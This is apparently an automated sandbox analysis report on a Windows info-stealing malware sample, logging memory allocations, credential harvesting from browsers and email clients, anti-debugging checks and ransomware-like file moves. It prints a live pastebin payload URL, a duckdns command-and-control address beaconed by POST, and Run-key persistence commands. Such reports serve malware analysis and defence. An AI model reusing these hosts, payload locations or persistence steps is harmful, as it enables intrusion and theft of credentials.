NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 1179648 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02680000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70d81000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x70d82000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02492000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02761000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02762000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02517000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0249b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02502000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02515000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0250c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024a6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0251c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02503000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02504000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02505000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02506000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02507000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02508000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02509000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02850000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02851000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02852000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02853000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02854000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 14, 2023, 5:04 p.m.	process_identifier: 2352 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02855000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks whether any human activity is being performed by constantly checking whether the foreground window changed

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (1 event)

Time & API	Arguments	Status	Return	Repeated
GetDiskFreeSpaceW May 14, 2023, 5:04 p.m.	number_of_free_clusters: 2409549 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1	0

Steals private information from local Internet browsers (1 event)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State

Looks up the external IP address (1 event)

domain

ip-api.com

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\lRDdN.vbs

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Drops a binary and executes it (1 event)

file	C:\Users\test22\wshsdk\python.exe

Executes one or more WMI queries (1 event)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "cmdc.exe")

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW May 14, 2023, 5:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 14, 2023, 5:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 14, 2023, 5:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW May 14, 2023, 5:04 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Potentially malicious URLs were found in the process memory dump (1 event)

url	http://www.nirsoft.net/

Yara rule detected in process memory (24 events)

description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Steal credential	rule	local_credential_Steal
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	email clients info stealer	rule	infoStealer_emailClients_Zero
description	Take ScreenShot	rule	ScreenShot
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Steal credential	rule	local_credential_Steal
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	email clients info stealer	rule	infoStealer_emailClients_Zero
description	Take ScreenShot	rule	ScreenShot

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess May 14, 2023, 5:04 p.m.	status_code: 0x00000001 process_identifier: 1868 process_handle: 0x00000180		0	0
NtTerminateProcess May 14, 2023, 5:04 p.m.	status_code: 0x00000001 process_identifier: 1868 process_handle: 0x00000180	1	0	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

taskkill /F /IM cmdc.exe

Connects to an IRC server, possibly part of a botnet

Wscript.exe initiated network communications indicative of a script based payload download (16 events)

Time & API	Arguments	Status	Return
WSASend May 14, 2023, 5:03 p.m.	buffer: GET /raw/WVFt9GbZ HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com socket: 584		0
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://pastebin.com/raw/WVFt9GbZ flags: 0	1	1
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: https://pastebin.com/raw/WVFt9GbZ flags: 0	1	1
WSASend May 14, 2023, 5:03 p.m.	buffer: okd`¹Ï \|ðÀAXëð8ÿcKmÃ¤\| é b«/5 ÀÀÀ À 28*ÿpastebin.com socket: 908		0
WSASend May 14, 2023, 5:03 p.m.	buffer: FBA²q·.í(ýuF=«G<¡¾²SO·Ûà²á¥ß*]fpzk\|ÿ5ìüä£òþ?ú´ûkM©%Û0M¤;»ëÇCïBªi>ÓbÎ)Ò[õ6Ð<_õ0¯ ~·å;¬ú¹p÷³¤.\Eº socket: 908		0
WSASend May 14, 2023, 5:03 p.m.	buffer: Àíöh ®Æ:ù(¨vÀ $^Óáû»*^æ\ÙýE S½! 1ñ'jarpì_.ÄÕ¦ pvµEj )çXzr(.×5ô¦.÷;îõòzMNC5»«m}Cwç©Ó½]4¦lVëÇe¤ºD5ÍÝr_qsý¹¡eß.Ø5 ª¾ªº¦2NyhùG¬ XÀtÄ±ÿ¼ÎVÌ ísÄ¯ò`ê M socket: 908		0
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:03 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:03 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW May 14, 2023, 5:04 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:04 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW May 14, 2023, 5:04 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:04 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
InternetCrackUrlW May 14, 2023, 5:05 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:05 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356

Installs itself for autorun at Windows startup (3 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\lRDdN	reg_value	wscript.exe //B "C:\Users\test22\lRDdN.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\lRDdN	reg_value	wscript.exe //B "C:\Users\test22\lRDdN.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\BXBCC2V24Z	reg_value	"C:\Users\test22\AppData\Roaming\windows.js"

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA May 14, 2023, 5:03 p.m.	key_handle: 0x00000384 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Harvests information related to installed instant messenger clients (1 event)

registry

HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Harvests credentials from local email clients (7 events)

registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
registry	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\POP3 User
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

wscript.exe-based dropper (JScript, VBS) (7 events)

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (21 events)

Time & API	Arguments	Status	Return
WSASend May 14, 2023, 5:03 p.m.	buffer: GET /raw/WVFt9GbZ HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: pastebin.com socket: 584		0
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://pastebin.com/raw/WVFt9GbZ flags: 0	1	1
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: https://pastebin.com/raw/WVFt9GbZ flags: 0	1	1
WSASend May 14, 2023, 5:03 p.m.	buffer: okd`¹Ï \|ðÀAXëð8ÿcKmÃ¤\| é b«/5 ÀÀÀ À 28*ÿpastebin.com socket: 908		0
WSASend May 14, 2023, 5:03 p.m.	buffer: FBA²q·.í(ýuF=«G<¡¾²SO·Ûà²á¥ß*]fpzk\|ÿ5ìüä£òþ?ú´ûkM©%Û0M¤;»ëÇCïBªi>ÓbÎ)Ò[õ6Ð<_õ0¯ ~·å;¬ú¹p÷³¤.\Eº socket: 908		0
WSASend May 14, 2023, 5:03 p.m.	buffer: Àíöh ®Æ:ù(¨vÀ $^Óáû»*^æ\ÙýE S½! 1ñ'jarpì_.ÄÕ¦ pvµEj )çXzr(.×5ô¦.÷;îõòzMNC5»«m}Cwç©Ó½]4¦lVëÇe¤ºD5ÍÝr_qsý¹¡eß.Ø5 ª¾ªº¦2NyhùG¬ XÀtÄ±ÿ¼ÎVÌ ísÄ¯ò`ê M socket: 908		0
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:03 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send May 14, 2023, 5:03 p.m.	buffer: ! socket: 992 sent: 1	1	1
InternetCrackUrlW May 14, 2023, 5:03 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:03 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send May 14, 2023, 5:03 p.m.	buffer: ! socket: 992 sent: 1	1	1
InternetCrackUrlW May 14, 2023, 5:04 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:04 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send May 14, 2023, 5:04 p.m.	buffer: ! socket: 992 sent: 1	1	1
InternetCrackUrlW May 14, 2023, 5:04 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:04 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send May 14, 2023, 5:04 p.m.	buffer: ! socket: 992 sent: 1	1	1
InternetCrackUrlW May 14, 2023, 5:05 p.m.	url: http://vj5566.duckdns.org:5566/Vre flags: 0	1	1
HttpOpenRequestW May 14, 2023, 5:05 p.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send May 14, 2023, 5:05 p.m.	buffer: ! socket: 992 sent: 1	1	1

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\wscript.exe" //B "C:\Users\test22\lRDdN.vbs"
parent_process	wscript.exe				martian_process	wscript.exe //B "C:\Users\test22\lRDdN.vbs"

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Windows\SysWOW64\wscript.exe

Performs 100 file moves indicative of a ransomware file encryption process (50 out of 100 events)

Time & API	Arguments	Status	Return
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\__init__.cpython-37.pyc.3426264 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc.3426264	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\codecs.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\codecs.cpython-37.pyc.4121664 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\codecs.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\codecs.cpython-37.pyc.4121664	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\aliases.cpython-37.pyc.3324768 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\aliases.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\aliases.cpython-37.pyc.3324768	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\utf_8.cpython-37.pyc.3325056 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\utf_8.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\utf_8.cpython-37.pyc.3325056	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\latin_1.cpython-37.pyc.3325440 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc.3325440	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\io.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\io.cpython-37.pyc.4164120 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\io.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\io.cpython-37.pyc.4164120	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\abc.cpython-37.pyc.8398944 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\abc.cpython-37.pyc.8398944	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\encodings\__pycache__\ascii.cpython-37.pyc.8626496 newfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\ascii.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\encodings\__pycache__\ascii.cpython-37.pyc.8626496	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\site.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\site.cpython-37.pyc.4144432 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\site.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\site.cpython-37.pyc.4144432	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\os.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\os.cpython-37.pyc.8487032 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\os.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\os.cpython-37.pyc.8487032	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\stat.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\stat.cpython-37.pyc.8527768 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\stat.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\stat.cpython-37.pyc.8527768	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\ntpath.cpython-37.pyc.8520856 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc.8520856	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\genericpath.cpython-37.pyc.8626784 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc.8626784	1	1
MoveFileWithProgressW May 14, 2023, 5:04 p.m.	newfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc flags: 1 oldfilepath_r: C:\Users\test22\wshsdk\lib\__pycache__\_collections_abc.cpython-37.pyc.8627744 newfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc oldfilepath: C:\Users\test22\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc.8627744	1	1
